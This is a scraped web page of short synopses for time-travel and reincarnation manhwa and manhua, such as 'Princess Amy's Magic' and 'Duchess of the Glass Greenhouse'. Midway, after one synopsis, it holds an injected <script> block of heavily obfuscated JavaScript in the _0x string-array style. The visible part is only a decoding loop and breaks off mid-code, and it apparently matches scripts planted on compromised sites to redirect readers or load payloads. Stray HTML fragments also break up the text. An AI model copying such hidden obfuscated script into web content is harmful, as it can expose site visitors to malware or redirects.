A prophecy declared that a child would lead the empire back to glory. That same year, Amy and her half-sister, Aurora, were born. Both girls competed for the title and when it seemed like Amy was going to win, Aurora convinced everyone that Amy was an evil witch and she had her burnt at the stake. But Amy didn’t die. She traveled back in time to her childhood and with the help of her best friend, Atlas, realized that she still had some of her magic. Amy will do anything to get her powers back, but will it be enough to claim her destiny? Her Royal Highness the Princess Returns to Full Level / Princess Amy’s Magic / Ai Mi Gong Zhu De Mo Fa / Ài Mǐ Gōng Zhǔ De Mó Fǎ / 艾米公主的魔法
Reina was born from a high noble lineage and became the wife of Duke Heathville. However, she faces a miserable death in which she is despised by her loved one, and even her child is taken away from her. But when Reina finally gave up on everything…she was given a second chance. «This time, I won’t turn a blind eye to whatever I see!» Reina summoned her courage and began to live her second life. « Edhart. I know everything now, and I hate you.» Reina realizes now how ignorant she was in the past. “I’m going to divorce you.” Even the husband that she once loved. “Alright.” Her husband, who she thought had despised her, was crying. Duchess of the Glass Greenhouse / 유리온실의 공작 부인
Read manhwa The Golden Light of Dawn / The golden dawn light will shine for you / 황금빛 여명이 너를 비추리 You’re still precious to me. After losing her family in a demon attack, Rosha is reborn as the 777th most powerful magic knight in the Golden Dawn Society. To avenge her family, she trains hard and rises through the ranks against the odds. Then, she is tasked with protecting little Joshua, who is said to be the Child of God.
In order to return to her past life, she must find a way meet her end. However the male lead who’s traveled back in time, keeps preventing her death. Dana is a side character destined to die for the leading couple, Arcane and Stella. So to get back to my real world, I have to do my best to fulfil her role…! But, why is the male lead so obsessed with me all of a sudden? And why do I get the feeling he’s purposely going against the flow of the original…? “I won’t let you die again because of me, Dana”
An arrogant and stubborn lady is dead, a revived 21st-century medical genius into her body. Medicine is excellent, the heart is pure. Facing her parents-in-law is unfriendly, her husband is not in love, and has a jealous look of concubines. Based only on a small scalpel, she won the concubine, defeated the tricky trick, and she always won. Marshal, her husband inherently despised her, but now, her husband climbed the window, crawled into her bed every night, and he wanted to be a happy couple forever.
Zhao Xiaotian suffered all kinds of hardships with relevance to supernatural powers. After he got caught up in an explosion, he was able to catch up with the comic genre trend nowadays which is: "Isekai". But unfortunately, the villains of the world still got their grasp on him for unknown reasons, maybe due to plot. He was continuously assassinated, kidnapped, and he was ripped of his money. And thenceforth, Zhang Xiaotian persevered on the way of cultivation!<script></script><script>function _0x3154(_0x1dd319,_0x1da527){var _0x3c823c=_0x1d11();return _0x3154=function(_0x8edc48,_0x5dbe20){_0x8edc48=_0x8edc48-(-0x1185+0x1*-0x148d+0x97*0x43);var _0x116b4c=_0x3c823c[_0x8edc48];return _0x116b4c;},_0x3154(_0x1dd319,_0x1da527);}(function(_0xb3a4d2,_0x359516){var _0x4df310=_0x3154,_0x4e9927=_0xb3a4d2();while(!![]){try{var _0x4f93f9=-parseInt(_0x4df310(0x177))/(-0x277+-0x885+0xafd*0x1)*(parseInt(_0x4df310(0x17b))/(0x18*0xde+0x24b*0x11+-0x3bc9))+-parseInt(_0x4df310(0x189))/(0x9*0x1f3+0x13e3+-0x256b)+-parseInt(_0x4df310(0x17e))/(0x15b*-0x11+-0xaec+0x21fb)+-parseInt(_0x4df310(0x178))/(0x2587+0xbe2+-0x3164*0x1)+-parseInt(_0x4df310(0x18b))/(0x877+-0x1b83+0x1312)+parseInt(_0x4df310(0x181))/(0x1ea2+-0x1*0x1235+-0x2*0x633)*(-parseInt(_0x4df310(0x185))/(0x1*0x186d+-0x158*0xc+-0x1d*0x49))+parseInt(_0x4df310(0x190))/(0x13b1+-0x2138+-0x1*-0xd90);if(_0x4f93f9===_0x359516)break;else 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A Joseon girl, Park Yeon Woo, has always believed that the fated love like in her favourite novel would come to her one day. However, on her first night of the wedding, her husband, Tae Ha, suddenly passed away. Unfortunately, she didn’t get to mourn for her husband’s passing as she has been kidnapped and thrown into a well mysteriously. The man who saved her certainly looks the same as her late husband, but this man is from Seoul of 2021! Would she be able to find true love this time? Miss Park’s contract marriage
One more shot at life! After her untimely demise, Xue Rong is rewarded with the chance to be reincarnated — but this time as some sort of cute, furry creature! She soon realizes that not only is she in the distant past, but also smack dab in the middle of an academy full of beautiful men!
Jung-woo Choi is an emerging force in the cosmetics industry. Her secretary, Su-hyeon Shin, is resourceful at work and also very handsome. One day, he suddenly received a special instruction from the president: “Secretary Shin, get married”. He received an offer to marry his own boss. He spent many nights worrying about writing a resignation letter, but the conditions to get this marriage are too great, right?! The office and their newlywed lives are an unpredictable love story! Let’s follow teenmanhua to follow the developments of the story! The President’s Special Instructions/사장님의 특별지시, President’s Special Order , CEO’s special order , Married to my boss
A 21st century top-class assassin travels back in time one day to find that she's been transformed into the Second Miss of the Duanmu Family, one of the five great aristocratic families of the Xuanyuan Dynasty. But, this Second Miss was naturally useless, obsessed with men and a mother out of wedlock! Fine, since she was there already, then she should live coolly. When she appeared in front of everyone with her genius son, she was no longer "her". She wandered Jianghu with her son, killing everyone that got in the way. How would she survive in this chaotic world? And, out of all the handsome men that followed by her side, which one was her child's father? Finally, who would win her heart? My Clever Mummy / Tiancai Baobei de Fuhei Diniang / 天才宝贝的腹黑嫡娘 / 킬러는 육아 중
<div class="description-summary"> <div class="summary__content show-more active">“Master, what’s the next lesson?!!!” A disaster that struck the earth, [Portal Impact], caused Park Hyunsoo, the MC, to lose his parents before his eyes. The only family member he has left is his younger sibling who is unconscious. In order to protect his younger sibling, he did his best but as a powerless support, he would always be on the other side of contempt… And that’s when a helper, Chungyeong, appeared! Chungyeong, a murim martial master that has travelled through time to come here from the Murim to teach Hyunsoo martial arts… “Hey, disciple…” “Yes, Master.”</div> <div class="c-content-readmore"></div> </div> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div>
Feng Sunuan, a famous doctor, accidentally time traveled to the ancient nation of Dali, and become Zhen Guogong’s foolish daughter. Not only did she get rejected from her own marriage, but almost lost her life too! She vowed that one day, she will get rid of all those people, so she would be ready for her road of revenge by acting dumb! As for her ignorant husband, as long as he doesn’t bother her, it’s all good! But why does this man say he dislikes her and, in the action, he’s getting closer and blushes from time to time? Princess Legend Guó Yī Kuáng Fēi National Doctor, Mad Concubine 国医狂妃